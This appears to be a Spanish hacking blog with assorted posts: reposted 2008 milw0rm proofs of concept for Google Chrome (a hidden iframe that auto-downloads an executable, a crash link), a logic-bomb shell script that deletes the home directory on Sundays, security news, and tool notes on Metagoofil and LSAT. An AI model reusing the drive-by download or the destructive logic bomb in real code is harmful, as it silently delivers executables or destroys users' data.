kernelpanic.org.mx

Por fin acaban de liberar el backtrack4 aquí les dejo el link de descarga para que todos lo disfrutemos

La mejor de las suertes para todos…

http://www.backtrack-linux.org/downloads/

Visitando  http://www.milw0rm.com/ me di cuenta de la vulnerabilidad del nuevo navegador de google.

El fallo radica en la librería chrome.dll del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador.

Para ver el articulo completo de la descripcion del fallo ve a:
http://www.dragonjar.org/

***************************************************************************
 Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0"
 height="0">');
</script>

# milw0rm.com [2008-09-03]

______________________________________________________________________________________

---------------------------------------------------
Software:
Google Chrome Browser 0.2.149.27

Tested:
Windows XP Professional SP3

Result:
Google Chrome Crashes with All Tabs

Problem:
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version
0.2.149.27. A crash can result without user interaction. When a user is made to visit
a malicious link, which has an undefined handler followed by a 'special' character,
the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It lies in dealing with the POP EBP instruction when pointed out by the
EIP register at 0x01002FF4.

Proof of Concept:

http://evilfingers.com/advisory/google_chrome_poc.php

Credit:
Rishi Narang (psy.echo)
www.greyhat.in
www.evilfingers.com
---------------------------------------------------

PoC Working/Exploit:
Click for a demo &lt;a href="EVIL:%"&gt;HERE&lt;/a&gt;

# milw0rm.com [2008-09-03]

Desde un pequeño sótano en California, el catedrático George Ledin y sus alumnos bombardean foros de Internet con spam, registrando actividad en línea e insertando aplicaciones de intrusión.

Es un día completamente normal en la clase de seguridad informática en la Universidad de Sonoma, Estados Unidos.

Este método de enseñar sobre seguridad informática es altamente controvertido, pero como el propio Ledin dice, “si no aprendes qué te agrede, ¿cómo podrás protegerte?”

Varias compañías de seguridad han declarado que no emplearan a un alumno de Ledin, precisamente debido a su educación. Ledin afirma a su vez que sus alumnos no hacen daño alguno, y que todo el hacking que sucede es en forma segura, todo sucede en una red cerrada para que nada pueda escaparse al resto del mundo.

“Conoce a tu enemigo”
“En contraste con los virus biológicos, los virus informáticos son escritos por un programador. Deseamos conocer la manera de pensar en como piensa esta persona. ¿Como aprenden ellos a escribir virus?, dice Ledin.

Sin embargo, no niega que este método se pueda ver como un pequeño ataque a McAfee, Symantec y otros programas de antivirus, que él califica en gran medida como inservibles. Ademas Ledin está en desacuerdo con lo que piensa se ha transformado en un monopolio de información en el que muchos dueños de antivirus no quieren informar acerca de los detalles de como ellos detienen un virus.

“Por qué nos vamos a distanciar de conocimiento que es importante para todos?”, pregunta Ledin, quien además no entiende que sea más peligroso estudiar sobre tecnología informática que otras materias.

“Si, puede ser peligroso para la sociedad, pero otras materias tambien pueden ser peligrosas, por ejemplo química y física”, puntualiza Ledin.

lei esta nota y me encanto, simplemente me encantaria estar hay y ademas que me recordo mucho a la raza de kernelpanic.

fuente: diarioti

El parche que corrige el grave agujero de seguridad descubierto por el hacker Dan Kaminsky fue instalado rápidamente en los servidores DNS de todo el mundo. Sin embargo, la solución no es del todo efectiva, según el físico ruso Evgeniy Polyakov, quien asegura haber inducido al parche a enviar una dirección IP falsa..

Polyakov indica que solo le tomó 10 horas descubrir el procedimiento adecuado, mediante dos PC de escritorio vinculados a una red de alta velocidad.

60% de posibilidades
El científico ruso indica que un servidor de ataques envía entre 40.000 y 50.000 respuestas falsas antes de encontrar la dirección correcta. Si el número del puerto coincide, las posibilidades de vulnerar el agujero son de 60%.

Por ahora, las grandes compañías de seguridad informática no han comentado los dichos de Polyakov, publicados por IT News.

Al parecer todavía no nos hemos librado del problema del envenenamiento remoto de DNS, ha si que no nos que da mas que seguirle dando XD.

fuente: DiarioTI

Metagoofil es una Herramienta para obtener información de documentos públicos. Metagoofil nos ayuda a obtener una lista de usuarios, para poder realizar ataques de fuerza bruta sobre los servicios disponibles (FTP, VPN, Aplicaciones WEB, POP3).

Metagoofil es una herramienta que se encarga de extraer Meta-Data (Datos sobre los Datos), de ciertos ficheros accesibles en los webs del “objetivo”.

Si Quieren saber como funciona cheken la web de Metagoofil

Las bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertado en programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o el alcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógica puede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho. Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con el suficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:

#!/bin/sh
if [ `date +%a` = "Sun" ];
then
rm -rf $HOME
else
vi.old $1
fi

Este cambio en el sistema puede permanecer durante años sin que se produzca un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuario decida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.

Es un programa Modular para hacer audiciones de seguridad a nuestra propia maquina, este programa escanea las inseguridades que podría explotar un usuario local para tener accesos no autorizados. Estas inseguridades pueden ser permisos de ficheros mal establecidos, malas configuraciones o versiones de programas ya antiguos.

Lsat lo podemos encontrar en http://usat.sourceforge.net
Despues de descargar el programa lo compilamos de la siguiente manera.

zerial@ZK:~$ tar zvxf lsat-VERSION.tgz
zerial@ZK:~$ cd lsat-VERSION
zerial@ZK:~$ ./configure
zerial@ZK:~$ make

despues como root hacemos

ZK:# ./lsat

Esto genera un informe en el fichero lsat.out ademas lsat acepta varias opciones:

-o fichero –> Genera el informe en fichero y no en lsat.out
-v –> Salida con detalle (recomendado)
-s –> Modo silencioso, crea informe pero no muestra ningún resultado por
la pantalla. Util cuando lsat se esta ejecutando desde el planificador
cron.
-r –> Realiza sumas de comprobaciones de paquetes RPM para buscar
ficheros que ayan cambiado su contenido o sus permisos iniciales.

Es importante mencionar que lsat fue inicialmente desarrollado para sistemas linux Red Hat o distribuciones basadas en este mismo, pero la mayor parate de
los análisis funcionan en cualquier sistema linux. (no e tenido problema alguno)

LSAT es un scaneador muy sencillo y la salidas que da son muy sencillas de leer, ademas que podemos descubrir errores en nuestro sistema que se pasan por alto sin que nos demos cuenta, ademas puedes ponerlo en cron y podemos checar los resultados con el comando diff y asi detectar cambios en la configuracion de nuestro sistema.

“Solucionen los problemas de seguridad de YouTube, o yo revelaré las vulnerabilidades”, amenaza hacker.

Diario Ti: El hacker Christian Matthies dice haber encontrado numerosos agujeros de seguridad en YouTube. Según Matthies, si Google no soluciona a la mayor brevedad las vulnerabilidades, él las hará públicas.

Ultimátum
El hacker asegura que Google no ha respondido sus mensajes de correo electrónico en que se refiere a las más de 40 vulnerabilidades que existirían en YouTube y que a su juicio comprometen la seguridad de los usuarios.

La publicación The Register indica que Google respondió sólo cuando el hacker publicó su advertencia en sla.ckers.org.

Según trascendió, la mayoría de los errores se basan en la posibilidad de ejecutar código maligno mediante las diversas funciones que tiene YouTube.

Posible intervenir perfiles
Matthies indica que los agujeros permiten además eliminar o alterar los perfiles de los usuarios. Una vez instalados, los códigos harían posible además hurtar información y distribuir spam.

Google ha anunciado que corregirá las vulnerabilidades.

Fuente: The Register